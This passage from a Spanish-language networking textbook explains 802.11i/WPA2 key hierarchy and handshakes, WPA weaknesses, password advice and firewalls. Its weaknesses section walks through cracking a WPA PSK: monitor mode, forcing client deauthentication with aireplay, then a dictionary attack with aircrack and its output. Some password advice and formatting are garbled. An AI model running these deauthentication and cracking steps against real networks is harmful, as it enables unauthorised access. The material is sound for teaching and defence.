cliente). Sigue a esto una autenticación abierta estándar (igual que en las redes TSN, donde
la autenticación siempre tiene éxito). La respuesta del cliente se incluye en el mensaje de
Association Request validado por una Association Response del punto de acceso.

La información sobre la política de seguridad se envía en el campo RSN IE (Information


Element) y detalla:

REDES WLAN CON ACCESS POINT 155


• Los métodos de autenticación soportados (802.1X, Pre-Shared Key (PSK)).

• Protocolos de seguridad para el tráfico unicast (CCMP, TKIP etc.) – la suit criptográfica
basada en pares.

• Protocolos de seguridad para el tráfico multicast (CCMP, TKIP etc.) – suit criptográfica
de grupo.

• Soporte para la pre-autenticación, que permite a los usuarios pre-autenticarse antes de


cambiar de punto de acceso en la misma red para un funcionamiento sin retrasos.

Figura 6.5 Fases operacionales de 802.11i.

La Figura 6.5 ilustra esta primera fase.

REDES WLAN CON ACCESS POINT 156


Figura 6.6 Fase 1: Acuerdo sobre la política de seguridad.

6.11.2 FASE 2: AUTENTICACIÓN 802.1X.

La segunda fase es la autenticación 802.1X basada en EAP y en el método específico de


autenticación decidido: EAP/TLS con certificados de cliente y servidor (requiriendo una
infraestructura de claves públicas), EAP/TTLS o PEAP para autenticación híbrida (con
certificados sólo requeridos para servidores), etc.

La autenticación 802.1X se inicia cuando el punto de acceso pide datos de identidad del
cliente, y la respuesta del cliente incluye el método de autenticación preferido. Se
intercambian entonces mensajes apropiados entre el cliente y el servidor de autenticación
para generar una clave maestra común (MK). Al final del proceso, se envía desde el
servidor de autenticación al punto de acceso un mensaje Radius Accept, que contiene la
MK y un mensaje final EAP Success para el cliente. La Figura 6.6 ilustra esta segunda fase.

REDES WLAN CON ACCESS POINT 157


Figura 6.7 Fase 2: Autenticación 802.1X.

6.11.3 FASE 3: JERARQUÍA Y DISTRIBUCIÓN DE CLAVES.

La seguridad de la conexión se basa en gran medida en las claves secretas. En RSN, cada
clave tiene una vida determinada y la seguridad global se garantiza utilizando un conjunto
de varias claves organizadas según una jerarquía.

Cuando se establece un contexto de seguridad tras la autenticación exitosa, se crean claves


temporales de sesión y se actualizan regularmente hasta que se cierra el contexto de seguri-
dad. La generación y el intercambio de claves es la meta de la tercera fase. Durante la
derivación de la clave, se producen dos handshakes (véase Figura 6.7):

REDES WLAN CON ACCESS POINT 158


Figura 6.8 Fase 3: Derivación y distribución de claves

• 4-Way Handshake para la derivación de la PTK (Pairwise Transient Key) y GTK


(Group Transient Key).
• Group Key Handshake para la renovación de GTK.

La derivación de la clave PMK (Pairwise Master Key) depende del método de


autenticación:

• Si se usa una PSK (Pre-Shared Key), PMK = PSK. La PSK es generada desde una
passphrase (de 8 a 63 caracteres) o una cadena de 256-bit y proporciona una
solución para redes domésticas o pequeñas empresas que no tienen servidor de
autenticación.
• Si se usa un servidor de autenticación, la PMK es derivada de la MK de
autenticación 802.1X.

REDES WLAN CON ACCESS POINT 159


La PMK en sí misma no se usa nunca para la encriptación o la comprobación de integridad.
Al contrario, se usa para generar una clave de encriptación temporal para el tráfico unicast
esta es la PTK (Pairwise Transient Key). La longitud de la PTK depende el protocolo de
encriptación: 512 bits para TKIP y 384 bits para CCMP. La PTK consiste en varias claves
temporales dedicadas:

• KCK (Key Confirmation Key 128 bits): Clave para la autenticación de mensajes
(MIC) durante el 4-Way Handshake y el Group Key Handshake.
• KEK (Key Encryption Key 128 bits): Clave para asegurar la confidencialidad de
los datos durante el 4 Way Handshake y el Group Key Handshake.
• TK (Temporary Key 128 bits): Clave para encriptación de datos (usada por TKIP
o CCMP).
• TMK (Temporary MIC Key 2x64 bits): Clave para la autenticación de datos
(usada sólo por Michael con TKIP). Se usa una clave dedicada para cada lado de la
comunicación.

Esta jerarquía se resume en la Figura 6.8.

El 4-Way Handshake, iniciado por el punto de acceso, hace posible:

• confirmar que el cliente conoce la PMK.

• derivar una PTK nueva.

• instalar claves de encriptación e integridad

• encriptar el transporte de la GTK.

• confirmar la selección de la suite de cifrado.

REDES WLAN CON ACCESS POINT 160


Figura 6.9 Fase 3: Jerarquía de clave por parejas

Se intercambian cuatro mensajes EAPOL-Key entre el cliente y el punto de acceso durante


el 4-Way Handshake. Esto se muestra en la Figura 6.9. La PTK se deriva de la PMK, una
cadena fija, la dirección MAC del punto de acceso, la dirección MAC del cliente y dos
números aleatorios (ANonce y SNonce, generados por el autenticador y el suplicante,
respectivamente).

El punto de acceso inicia el primer mensaje seleccionando el número aleatorio ANonce y


enviándoselo al suplicante, sin encriptar el mensaje o protegerlo de las trampas. El
suplicante genera su propio número aleatorio SNonce y ahora puede calcular la PTK y las
claves temporales derivadas, así que envía el SNonce y la clave MIC calculada del segundo
mensaje usando la clave KCK. Cuando el autenticador recibe el segundo mensaje, puede
extraer el SNonce (porque el mensaje no está encriptado) y calcular la PTK y las claves
temporales derivadas.

REDES WLAN CON ACCESS POINT 161


Ahora puede verificar el valor de MIC en el segundo mensaje y estar seguro de que el
suplicante conoce la PMK y ha calculado correctamente la PTK y las claves temporales
derivadas.

Figura 6.10 Fase 3: 4-Way Handshake.


El tercer mensaje enviado por el autenticador al suplicante contiene el GTK (encriptada con
la clave KEK), derivada de un GMK aleatorio y GNonce (ver Figura 6.10), junto con el
MIC calculado del tercer mensaje utilizando la clave KCK. Cuando el suplicante recibe este
mensaje, el MIC se comprueba para asegurar que el autenticador conoce el PMK y ha
calculado correctamente la PTK y derivado claves temporales.

REDES WLAN CON ACCESS POINT 162


El último mensaje certifica la finalización del handshake e indica que el suplicante ahora
instalará la clave y empezará la encriptación. Al recibirlo, el autenticador instala sus claves
tras verificar el valor MIC. Así, el sistema móvil y el punto de acceso han obtenido,
calculado e instalado unas claves de integridad y encriptación y ahora pueden comunicarse
a través de un canal seguro para tráfico unicast y multicast. El tráfico multicast se protege
con otra clave: GTK (Group Transient Key), generada de una clave maestra llamada GMK
(Group Master Key), una cadena fija, la dirección MAC del punto de acceso y un número
aleatorio GNonce. La longitud de GTK depende del protocolo de encriptación 256 bits
para TKIP y128 bits para CCMP. GTK se divide en claves temporales dedicadas:

• GEK (Group Encryption Key): Clave para encriptación de datos (usada por CCMP
para la autenticación y para la encriptación, y por TKIP).

• GIK (Group Integrity Key): Clave para la autenticación de datos (usada solamente
por Michael con TKIP).

Figura 6.11 Fase 3: Jerarquía de Group Key.

REDES WLAN CON ACCESS POINT 163


Se intercambian dos mensajes EAPOL-Key entre el cliente y el punto de acceso durante el
Group Key Handshake. Este handshake hace uso de claves temporales generadas durante el
4-Way Handshake (KCK y KEK). El proceso se muestra en la Figura 6.11. El Group Key
Handshake sólo se requiere para la disasociación de una estación o para renovar la GTK, a
petición del cliente. El autenticador inicia el primer mensaje escogiendo el número
aleatorio GNonce y calculando una nueva GTK. Envía la GTK encriptada (usando KEK), el
número de secuencia de la GTK y el MIC calculado de este mensaje usando KCK al
suplicante. Cuando el mensaje es recibido por el suplicante, se verifica el MIC y la GTK
puede ser desencriptada.

El segundo mensaje certifica la finalización del Group Key Handshake enviando el número
de secuencia de GTK y el MIC calculado en este segundo mensaje. Al ser recibido este, el
autenticador instala la nueva GTK (tras verificar el valor MIC). También existe un STAkey
Handshake, pero no lo vamos a tratar aquí. Soporta la generación de una clave, llamada
STAkey, por el punto de acceso para conexiones ad-hoc.

Figura 6.12 Fase 3: Group Key Handshake.

REDES WLAN CON ACCESS POINT 164


6.11.4 FASE 4: CONFIDENCIALIDAD E INTEGRIDAD DE DATOS RSNA.

Todas las claves generadas anteriormente se usan en protocolos que soportan la


confidencialidad e integridad de datos RSNA:

• TKIP (Temporal Key Hash).

• CCMP (Counter-Mode / Cipher Block Chaining Message Authentication Code


Protocol).
• WRAP (Wireless Robust Authenticated Protocol).

Hay un concepto importante que debe ser entendido antes de detallar estos protocolos: la
diferencia entre MSDU (MAC Service Data Unit) y MPDU (MAC Protocol Data Unit).
Ambos términos se refieren a un sólo paquete de datos, pero MSDU representa a los datos
antes de la fragmentación, mientras las MPDUs son múltiples unidades de datos tras la
fragmentación.

La diferencia es importante en TKIP y en el protocolo de encriptación CCMP, ya que en


TKIP el MIC se calcula desde la MSDU, mientras que en CCMP se calcula desde MPDU.
Al igual que WEP, TKIP está basada en el algoritmo de encriptación RC4, pero esto es así
tan sólo por un motivo: permitir a los sistemas WEP la actualización para instalar un pro-
tocolo más seguro. TKIP se requiere para la certificación WPA y se incluye como parte de
RSN 802.11i como una opción. TKIP añade medidas correctoras para cada una de las
vulnerabilidades de WEP descritas anteriormente:

• Integridad de mensaje: un nuevo MIC (Message Integrity Code) basado en el


algoritmo Michael puede ser incorporado en el software para microprocesadores
lentos.

• IV: nuevas reglas de selección para los valores IV, reutilizando IV como contador
de repetición.

REDES WLAN CON ACCESS POINT 165


• (TSC, o TKIP Sequence Counter) e incrementando el valor del IV para evitar la
reutilización.

• Per Packet Key Mixing: para unir claves de encriptación aparentemente inconexas.

• Gestión de claves: nuevos mecanismos para la distribución y modificación de


claves.

TKIP Key-Mixing Scheme se divide en dos fases. La primera se ocupa de los datos
estáticos – la clave TEK de sesión secreta, el TA de la dirección MAC del transmisor
(incluido para prevenir colisiones IV) y los 32 bits más altos del IV.

La fase 2 incluye el resultado de la fase 1 y los 16 bits más bajos del IV, cambiando todos
los bits del campo Per Packet Key para cada nuevo IV. El valor IV siempre empieza en 0 y
es incrementado de uno en uno para cada paquete enviado, y los mensajes cuyo TSC no es
mayor que el del último mensaje son rechazados.

El resultado de la fase 2 y parte del IV extendido (además de un bit dummy) componen la


entrada para RC4, generando un flujo de clave que es XOR-eado con el MPDU de sólo tex-
to, el MIC calculado del MPDU y el viejo ICV de WEP (ver Figura 6.12).

REDES WLAN CON ACCESS POINT 166


Figura 6.13 Esquema y Encriptación de TKIP Key-Mixing.

REDES WLAN CON ACCESS POINT 167


La computación del MIC utiliza el algoritmo Michael de Niels Ferguson. Se creó para
TKIP y tiene un nivel de seguridad de 20 bits (el algoritmo no utiliza multiplicación por
razones de rendimiento, porque debe ser soportado por el viejo hardware de red para que
pueda ser actualizado a WPA). Por esta limitación, se necesitan contramedidas para evitar
la falsificación del MIC. Los fallos de MIC deben ser menores que 2 por minuto, o se
producirá una desconexión de 60 segundos y se establecerán nuevas claves GTK y PTK
tras ella. Michael calcula un valor de comprobación de 8 octetos llamadoMIC y lo añade a
la MSDU antes de la transmisión. El MIC se calcula de la dirección origen (SA), dirección
de la TMK apropiada (dependiendo del lado de la comunicación, se utilizará una clave
diferente para la transmisión y la recepción).

Figura 6.14 Computación de MIC utilizando el algoritmo Michael.

CCMP se basa en la suite de cifrado de bloques AES (Advanced Encryption Standard) en


su modo de operación CCM, con la clave y los bloques de 128 bits de longitud. AES es a
CCMP lo que RC4 a TKIP, pero al contrario que TKIP, que se diseñó para acomodar al
hardware WEP existente, CCMP no es un compromiso, sino un nuevo diseño de protocolo.
CCMP utiliza el counter mode junto a un método de autenticación de mensajes llamado
Cipher Block Chaining (CBC-MAC) para producir un MIC. Se añadieron algunas
características interesantes, como el uso de una clave única para la encriptación y la
autenticación (con diferentes vectores de inicialización), el cubrir datos no encriptados por
la autenticación. El protocolo CCMP añade 16 bytes al MPDU, 8 para el encabezamiento
CCMP y 8 para el MIC.

REDES WLAN CON ACCESS POINT 168


Figura 6.15 Encriptación CCMP.

REDES WLAN CON ACCESS POINT 169


La computación de MIC utiliza el algoritmo CBC-MAC que encripta un bloque nonce de
inicio (computado desde los campos de Priority, la dirección fuente de MPDU y el PN
incrementado) y hace XORs sobre los bloques subsiguientes para obtener un MIC final de
64 bits (el MIC final es un bloque de 128-bits, ya que se descartan los últimos 64 bits). El
MIC entonces se añade a los datos de texto para la encriptación AES en modo contador. El
contador se construye de un once similar al del MIC, pero con un campo de contador extra
inicializado a 1 e incrementado para cada bloque.

El último protocolo es WRAP, basado también en AES pero utilizando el esquema de


encriptación autenticada OCB (Offset Codebook Mode – encriptación y autenticación en la
misma operación). OCB fue el primer modo elegido por el grupo de trabajo de IEEE
802.11i, pero se abandonó por motivos de propiedad intelectual y posibles licencias.
Entonces se adoptó CCMP como obligatorio.

6.11.5 DEBILIDADES DE WPA/WPA2.

Aunque se han descubierto algunas pequeñas debilidades en WPA/ WPA2 desde su


lanzamiento, ninguna de ellas es peligrosa si se siguen unas mínimas recomendaciones de
seguridad. La vulnerabilidad más práctica es el ataque contra la clave PSK de WPA/WPA2.
Como ya hemos dicho, la PSK proporciona una alternativa a la generación de 802.1X PMK
usando un servidor de autenticación. Es una cadena de 256 bits o una frase de 8 a 63
caracteres, usada para generar una cadena utilizando un algoritmo conocido: PSK = PMK =
PBKDF2 (frase, SSID, SSID length, 4096, 256), donde PBKDF2 es un método utilizado en
PKCS#5, 4096 es el número de hashes y 256 la longitud del resultado. La PTK es derivada
de la PMK utilizando el 4-Way Handshake y toda la información utilizada para calcular su
valor se transmite en formato de texto. La fuerza de PTK radica en el valor de PMK, que
para PSK significa exactamente la solidez de la frase. Como indica Robert Moskowitz, el
segundo mensaje del 4-Way Handshake podría verse sometido a ataques de diccionario o
ataques offline de fuerza bruta. La utilidad cowpatty se creó para aprovechar este error, y su
código fuente fue usado y mejorado por Christopher Devine en Aircrack para permitir este
tipo de ataques sobre WPA.

REDES WLAN CON ACCESS POINT 170


El diseño del protocolo (4096 para cada intento de frase) significa que el método de la
fuerza bruta es muy lento (unos centenares de frases por segundo con el último procesador
simple). La PMK no puede ser pre-calculada (y guardada en tablas) porque la frase de
acceso está codificada adicionalmente según la ESSID. Una buena frase que no esté en un
diccionario (de unos 20 caracteres) debe ser escogida para protegerse eficazmente de esta
debilidad. Para hacer este ataque, el atacante debe capturar los mensajes de 4-Way
Handshake monitorizando pasivamente la red inalámbrica o utilizar el ataque de
desautenticación para acelerar el proceso. De hecho, los dos primeros mensajes se necesitan
para poder intentar adivinar los valores de PSK. Recordemos que PTK = PRF-X (PMK,
Pairwise key expansion, Min(AP_Mac, STA_Mac) || Max(AP_ Mac, STA_Mac) ||
Min(ANonce, SNonce) || Max(ANonce, SNonce)), donde PMK es igual a PSK en nuestro
caso. Tras el segundo mensaje, el atacante conoce ANonce (del primer mensaje) y SNonce
(del segundo mensaje) y puede empezar a intentar calcular el valor PSK para calcular PTK
y derivar claves temporales. Si se adivina correctamente la PSK, el MIC del segundo
mensaje podría obtenerse con el correspondiente KCK y si no se consigue, hay que seguir
intentando adivinarla. Como ejemplo práctico, empezamos al igual que lo hicimos en el
ejemplo de crackeado de WEP. Lo primero será activar el modo monitor:

# airmon.sh start ath0

El siguiente paso descubre las redes cercanas y sus clientes asociados (ver Listado 7).

Listado 7. Descubriendo redes cercanas

# airodump ath0 wpa-crk 0

BSSID PWR Beacons # Data CH MB ENC ESSID


00:13:10:1F:9A:72 56 112 16 1 48 WPA hakin9demo

BSSID STATION PWR Packets ESSID


00:13:10:1F:9A:72 00:0C:F1:19:77:5C 34 1 hakin9demo

REDES WLAN CON ACCESS POINT 171


El resultado se puede interpretar así: un punto de acceso con BSSID 00:13:10:1F:9A:72
usando encriptación WPA en el canal 1 con SSID hakin9demo y un cliente, identificado por
la dirección MAC 00:0C:F1:19:77:5C están asociados y autenticados en esta red
inalámbrica (lo que significa que ya se ha producido el 4-Way Handshake para este cliente).
Una vez la red objetivo se ha encontrado, la captura debe ser lanzada sobre el canal
apropiado para evitar perder paquetes necesarios mientras escaneamos otros canales:

# airodump ath0 wpa-psk 1

Debemos entonces deautenticar los clientes legítimos, forzándolos a iniciar un nuevo


proceso de autenticación y permitiéndonos capturar los mensajes de 4-Way Handshake.
Aireplay se usa para este ataque, y deautenticará al cliente deseado con la BSSID
especificada enviándole una petición de desautenticación falsa:

# aireplay -0 1 -a <BSSID>
-c <client_mac> ath0

Listado 8. Lanzando un ataque de diccionario

$ aircrack –a 2 –w some_dictionnary_file -0 wpa-psk.cap.


Opening wpa-psk.cap
Read 541 packets.

BSSID ESSID Encryption


00:13:10:1F:9A:72 hakin9demo WPA (1 handshake)

El último paso será lanzar un ataque de diccionario usando Aircrack (ver Listado 8). La
Figura 6.15 muestra los resultados. (el fondo es negro y las letras blancas)

REDES WLAN CON ACCESS POINT 172


aircrack 2.3

[00:00:03] 524 keys tested (131.66 k/)


KEY FOUND! [hakin9demo]

Master Key : A6 80 CE D5 B5 0E 0F F7 21 FD BD E4 12 78 B6 8B
69 20 4A 1E C4 0B 0E BB A3 59 51 B9 4E 67 3A 63

Transcient Key : 61 D2 7F 90 E2 74 CF 72 24 5D 6D 0E A5 C3 D8 BA
CE 62 04 8E 29 2F F5 B0 8F 94 63 2B 1B 6A B9 1F
14 D6 02 75 CF 20 E1 CB A0 95 DC CC CF 07 79 3F
E3 27 20 52 74 7C BC 59 F4 C5 0E 0A C1 58 C8 D5

EAPOL HMAC : 26 02 4C 0A F6 A3 2C 0D F2 FC 70 E1 D3 AC 46 9D

Figura 6.16 Una PSK WPA débil ha sido encontrada con Aircrack.

La otra debilidad WPA es una posibilidad de Negación del Servicio durante el 4-Way
Handshake. Changhua He y John C. Mitchell se dieron cuenta de que el primer mensaje del
4-Way Handshake no está autenticado, y cada cliente tiene que guardar cada primer
mensaje hasta que reciban un tercer mensaje válido (firmado), dejando al cliente poten-
cialmente vulnerable ante el agotamiento de memoria.

Haciendo un spoofing del primer mensaje enviado por el punto de acceso, un atacante
podría realizar un ataque DoS sobre el cliente si es posible que existan varias sesiones
simultáneas.

REDES WLAN CON ACCESS POINT 173


Listado 9. Ejemplo de archivo de configuración de wpa_supplicant para WPA2

ap_scan=1 # Analiza frecuencias de Radio y selecciona punto ← de acceso


apropiado
network={ # Primera red inalámbrica
ssid=" # SSID de la red
scan_ssid=1 # Envía petición de prueba para encontrar SSID ocultos
proto=RSN # RSN para WPA2/IEEE 802.11I
key_mgmt=WPA-PSK # Autenticación de la clave pre-compartida
pairwise=CCMP # Protocolo CCMP (encriptación AES)
psk=1232813c587da145ce647fd43e5908abb45as4a1258fd5e410385ab4e5f435ac
}

El código de integridad de mensajes Michael tiene también debilidades conocidas que


provienen de su propio diseño (forzado por el grupo de trabajo de 802.11i). La seguridad de
Michael se basa en que la comunicación esté encriptada. Aunque los MICs criptográficos
están generalmente diseñados para resistir a este tipo de ataques de texto conocidos (donde
el atacante tiene un mensaje de texto y su MIC), Michael es vulnerable a estos ataques,
porque es invertible. Si se le da un sólo mensaje y su valor MIC, se puede descubrir la clave
secreta de MIC, así que mantener el secreto del valor de MIC es crítico. La debilidad final
conocida es la posibilidad teórica de un ataque contra el Temporal Key Hash de WPA, que
implica una complejidad de ataque reducida (de∂128 a ∂105) bajo ciertas circunstancias
(conocimiento de varias claves RC4).

WPA/WPA2 se ven sometidas a vulnerabilidades que afectan a otros mecanismos estándar


de 802.11i, como son los ataques con spoofing de mensajes 802.1X (EAPoL Logoff, EAPoL
Start, EAP Failure etc.), descubiertos por primera vez por William A. Arbaugh y Arunesh
Mishra y posibles gracias a una falta de autenticación. Por último, es importante destacar
que el uso del protocolo WPA/WPA2 no tiene protección alguna frente a ataques sobre las
tecnologías en que se basan, como puede ser la intercepción de frecuencias de radio,
Negación del Servicio a través de violaciones de 802.11, de autenticación, de asociación,
etc.

REDES WLAN CON ACCESS POINT 174


6.11.6 PUESTA EN PRÁCTICA EN LOS SISTEMAS OPERATIVOS DE WPA/
WPA2.

Windows no incorpora soporte WPA2 por defecto. Una actualización para Windows XP
SP2 (KB893357) lanzada el 29 de abril de 2005, añadió WPA2 y una mejor detección de
redes (ver Figura 6.16). Otros sistemas operativos de Microsoft tienen que utilizar un
suplicante externo (comercial o de código abierto, como wpa_supplicant – la versión de
Windows es experimental).

En Linux y *BSD, wpa_supplicant estaba listo para cuando salió el estándar 802.11i. El
suplicante externo soporta un gran número de métodos EAP y características de gestión de
claves para WPA, WPA2 y WEP. Pueden declararse varias redes con diferentes tipos de
encriptación, gestión de claves y métodos EAP, el Listado 9 presenta un simple fichero de
configuración de WPA2. El lugar por defecto de la configuración de wpa_supplicant es
/etc/wpa_supplicant.conf, y el archivo sólo debería ser accesible para el usuario root.

El daemon wpa_supplicant debería primero lanzarse con privilegios de root en modo debug
(opción -dd ), con el controlador adecuado (en nuestro ejemplo es -D madwifi para soportar el
chipset Atheros), el nombre de la interfaz (opción -i, en nuestro caso ath0) y la ruta del fichero
de configuración (opción c):

# wpa_supplicant
-D madWi-Fi
-dd -c /etc/wpa_supplicant.conf
-i ath0

Todos los pasos teóricos descritos son resultado del modo debug (Asociación AP,
autenticación 802.1X, 4-Way Handshake etc.). Cuando todo esté funcionando,
wpa_supplicant debería ejecutarse en modo daemon (sustituye la opción dd por B).

REDES WLAN CON ACCESS POINT 175


En Macintosh, WPA2 es soportado tras la salida de la actualización 4.2 del software Apple
AirPort: Los Macintosh con AirPort Extreme, La estación base AirPort Extreme Base
Station y AirPort Express.

Figura 6.17 Soporte de WPA2 en Windows XP SP2

6.12 LA IMPORTANCIA DE LA CLAVE DE ACCESO.

Una de las formas más simples de mantener nuestra seguridad informática es mediante las
claves de acceso. En este sentido el elegir una buena clave de acceso es fundamental. Según
el CERT (Computer Emergency Response Tean, ‘Equipo de respuesta para Emergencias

REDES WLAN CON ACCESS POINT 176


Informáticas del Gobierno de los estados Unido), el 80% de las violaciones de
computadoras son debidas al uso de claves de acceso inadecuadas. Para que las claves de
acceso sean una buena protección, solo hay que tener en cuenta las siguientes reglas.

• Que tenga una longitud mínima de seis caracteres.


• Que no sea una palabra con significado (por ejemplo, MAMA).
• Que corresponda con las iniciales del nombre del usuario o de la empresa (por
ejemplo, TdE o IBM).
• Que no se una letra repetida (por ejemplo, AAAA).
• Que no esté formada por letras contiguas del alfabeto (por ejemplo, QWERTY).
• Que mezcle letras mayúsculas, minúsculas y números (por ejemplo, T2PYlh).
• Y por ultimo cambie periódicamente las claves de acceso.

6.13 RECOMENDACIONES DE WECA.

Aunque efectivamente no se puede garantizar totalmente la seguridad (de ningún tipo de


comunicación), siempre se puede tomar ciertas precauciones para hacer más complicado el
trabajo a los intrusos. . WECA, la asociación de fabricantes de equipos inalámbricos,
recomienda tomar las siguientes precauciones:

• Nunca decirle a nadie la clave, y en el caso de las empresas, asegurarse que todos
los trabajadores siguen esta regla.
• Evitar en lo posible el uso de claves estáticas. Las claves hay que modificarlas
frecuentemente, aunque sea una molestia.
• Utilizar un cortafuegos (firewall).
• Examinar la red WiFi frecuentemente para comprobar que no existen conexiones
no autorizadas.

REDES WLAN CON ACCESS POINT 177


6.14 COMPROBRAR LA SEGURIDAD.

Mucho se ha hablado del las ventajas e inconvenientes de los sistemas de seguridad de las
redes WiFi. También se podría hablar mucho de hasta qué punto son necesarias unas altas
medidas de seguridad en nuestra red. En cualquier caso siempre resultara interesante ser
consientes de la importancia que tiene la seguridad en nuestro caso y cuáles son nuestras
debilidades la única manera de encontrar las respuestas es haciéndose preguntas como las
siguientes:

• ¿Qué aspecto tiene ni red desde el punto de vista pirata?


• ¿Cuál es la aplicación, el sistema o la información más importante de la que
dispongo y cuales serian las consecuencias si acceden a ellas personas ajenas?
• ¿Cuál es la aplicación, el sistema o la información más importante de la que
dispongo y cuales serian las consecuencias si dejo de poder acceder a ellas?
• ¿Qué otras redes inalámbricas opera en la zona, si puedo verlas, quizás sus usuarios
también pueden ver mi red?
• ¿Cómo podría un intruso acceder a mi red? ¿Qué podría hacer si se consigue tener
acceso? ¿Cuál sería el riesgo?
• ¿De qué forma podría detectar si algún intruso ha logrado entrar en mi red?
• ¿Cómo puedo comprobar mi seguridad?

En definitiva se trata de determinar las debilidades de nuestra red y valorar el riesgo de que
nuestros datos estén expuestos a terceras personas. Esto último es juna tarea, hasta cierto
punto subjetiva, que depende de la actividad a la que nos dediquemos.

Sin embargo para analizar las debilidades de nuestra red, contamos con herramientas
interesantes. Ahora bien, de la misma forma que estas herramientas ayudan a analizar y
mejorar la seguridad de una red inalámbrica, también ayudan a los intrusos a averiguar por
donde poder atacar a la red, por tanto es importante sacar ventaja del conocimiento de estas
herramientas.

REDES WLAN CON ACCESS POINT 178


6.15 LA SOLUCIÓN PROPIETARIA.

Se conoce como solución propietaria a aquella que no está incluida en el estándar, si no que
ofrecida exclusivamente por el fabricante (es propiedad ese fabricante). En lo referente a la
seguridad, si se está muy interesado en disponer de una red inalámbrica con unas buenas
medidas de seguridad, en el mercado existen equipos WiFi que ofrecen soluciones
propietarias que permiten configurar la red con eficientes métodos de cifrado, una
autentificación adecuada o sistemas automáticos de gestión de claves. El inconveniente de
las soluciones propietarias es que. Al no estar incluidas en el estándar WiFi, solo funcionan
en los equipos del fabricante que las incorpora. En muchos casos esto supone también que
las computadoras en las que se instalan estos equipos propietarios dejan de poderse
conectar fácilmente con las redes WiFi que no disponen de puntos de acceso de dicho
fabricante.

En general, si la red inalámbrica se le va a dar un uso particular o se va a utilizar en la


empresa para labores normales donde la seguridad no es un asunto excesivamente critico,
realmente, no hará falta someterse a las limitaciones de no poder cambiar de fabricante,
pero si por ejemplo se trabaja en el departamento de desarrollo de nuevos productos, se
requiere una alta disponibilidad del servicio o se trabaja con información de carácter
personal.

6.16 FIREWALL.

Los firewall son una de las más importantes medidas de seguridad para poder proteger una
computadora personal de los posibles ataques que pueda recibir, tanto a través de un
entorno no del todo seguro como el uso de las redes WiFi, como a través de una conexión
de banda ancha entorno no del todo seguro como el de las redes WiFi como a través de una
conexión de banda ancha a internet.

REDES WLAN CON ACCESS POINT 179


Figura 6.18 Diagrama de Firewall.

El firewall no protege las comunicaciones, sino que protege a la computadora para que
ningún intruso pueda hacer uso del disco duro o de cualquier otro recurso. Un punto de
acceso o un router puede tener también determinadas propiedades de firewall para proteger
los recursos de la red. Los firewall llevan a cabo una protección analizando los datos de
petición de acceso a los distintos recursos y bloqueando los que no estén permitidos. Para
las aplicaciones en el hogar o en pequeños negocios, es posible que sea suficiente con las
características de firewall incluidas en el punto de acceso normal.

No obstante existen puntos de acceso profesionales que mejoran fuertemente estas


características. Aparte de lo anterior, un firewall puede ser tanto un equipo hardware
especifico, como un software instalado en una computadora,

REDES WLAN CON ACCESS POINT 180


6.16.1 LOS FILTROS DEL FIREWALL.

El firewall toma decisión de que datos deja pasar y que otros no analizando los paquetes de
información. La principal diferencia entre un buen firewall y uno menos bueno es la
cantidad de información que es capaz de analizar para tomar las decisiones. En la
actualidad existen tres tipos de firewall:

• Filtrado de paquetes. Estos facilitan un control de acceso básico basado en la


información sobre el protocolo de los paquetes de acuerdo con el protocolo de
comunicación que utiliza el paquete. Los Reuters incluidos en los puntos de acceso
ya suelen disponer de este tipo de filtrado. El problema es que esto supone una
protección mínima para el usuario.

• Servidor Proxy: se trata de una aplicación software que va más allá del simple
filtrado del protocolo del paquete. Este tipo de firewall puede tomar decisiones
basado en el análisis completo de todo un conjunto de paquetes asociados a una
sesión que tiene el mismo destinatario. Ciertamente un proxy mejora la seguridad
aunque tiene el inconveniente de parar la comunicación.

• Análisis completo del paquete. Estos se basan en la misma técnica de filtrado de


paquetes pero en vez de analizar la dirección de la cabecera del paquete, va
interceptando paquetes hasta que tiene información suficiente para mantener su
seguridad. Posteriormente, entrega estos paquetes al destinatario de la red interna y
permite una comunicación directa entre este destinatario interno y su extremo
externo. Este firewall bloquea todas las comunicaciones generadas en internet y deja
pasar aquellas iniciadas por cualquier computadora interna. El resultado es una
comunicación más fluida que con los proxy, pero la seguridad es menor.

REDES WLAN CON ACCESS POINT 181


6.16.2 LAS REGLAS FILTRADO.

Las reglas de las que dependen los filtros de los firewall se basa en distintos factores,
condiciones o características de los paquetes de datos. Las características más comunes son
las siguientes:

• Dirección IP. Tanto la dirección IP origen como destino pueden ser utilizadas para
controlar los paquetes. Este tipo de filtros se utiliza habitualmente para bloquear la
comunicación con ciertos servidores externos o para bloquear el acceso a internet de
ciertos usuarios.

• Nombres de dominio: esta característica se utiliza de la misma forma que el filtrado


de direcciones IP, pero basadas en los nombres de dominio en vez de en los
números IP. Y a sabemos que los números IP de un servidor pueden cambiarse
fácilmente, mientras que los nombres de dominio suelen ser más estables.

• Protocolos. Los protocolos son también una característica interesante a filtrar. Por
ejemplo, se puede dejar pasar el protocolo http para permitir el acceso a páginas
web, pero no permitir el protocolo telnet para impedir ejecutar comandos en
computadoras remotas, el protocolo ftp para impedir la bajada de archivos
potencialmente infectados de virus o el protocolo smtp para impedir que desde la
computadora de un usuario se pueda crear un servidor de correo desde donde enviar
correos ilegales (spam).

• Puertos. Mientras las direcciones IP se utilizan para identificar a los equipos origen
y destino de la comunicación, los puertos son unos números que sirven para
identificar cada unas de las aplicaciones con comunicaciones simultáneas que puede
tener un mismo equipo. Generalmente cada número de puerto se utiliza para una
aplicación distinta. Por ejemplo el servicio web suele utilizar el puerto 80.

REDES WLAN CON ACCESS POINT 182


• Contenido. Los firewall pueden filtrar también los datos que contienen
determinadas palabras o frases. En este caso el firewall analiza todo el contenido de
los paquetes en busca de las palabras o frases prohibidas.

Por su lado, los servicios de distribución son estos otros:

• Asociación. Para que una terminal pueda comunicarse con otras terminales a través
de un punto de acceso, debe primero estar asociado a dicho punto de acceso.
Asociación significa asignación del terminal al punto de acceso haciendo que este
sea el responsable de la distribución de datos, y desde dicha terminal. En las redes
con más de un punto de acceso, una terminal solo puede estar asociada a un punto
de acceso simultáneamente.

• Desasociación: Cancela una asociación existente, bien porque la terminal sale del
área de cobertura del punto de acceso, o porque el punto de acceso termina la
conexión.

• Reasociación: Transfiere una asociación entre dos puntos de acceso. Cuando una
terminal se mueve del área de cobertura de un punto de acceso a la de otro, su
asociación pasa a depender de este ultimo.

• Distribución. Cuando se transfieren datos de una terminal a otra, el servicio de


distribución se asegura de que los datos alcanzan su destino.

• Integración. Facilita la transferencia de datos entre la red inalámbrica IEEE 802.11


y cualquier otra red (por ejemplo, internet o Ethernet).

REDES WLAN CON ACCESS POINT 183


CONCLUSIONES

Para disponer de una red inalámbrica, solo hace falta instalar una tarjeta de red inalámbrica
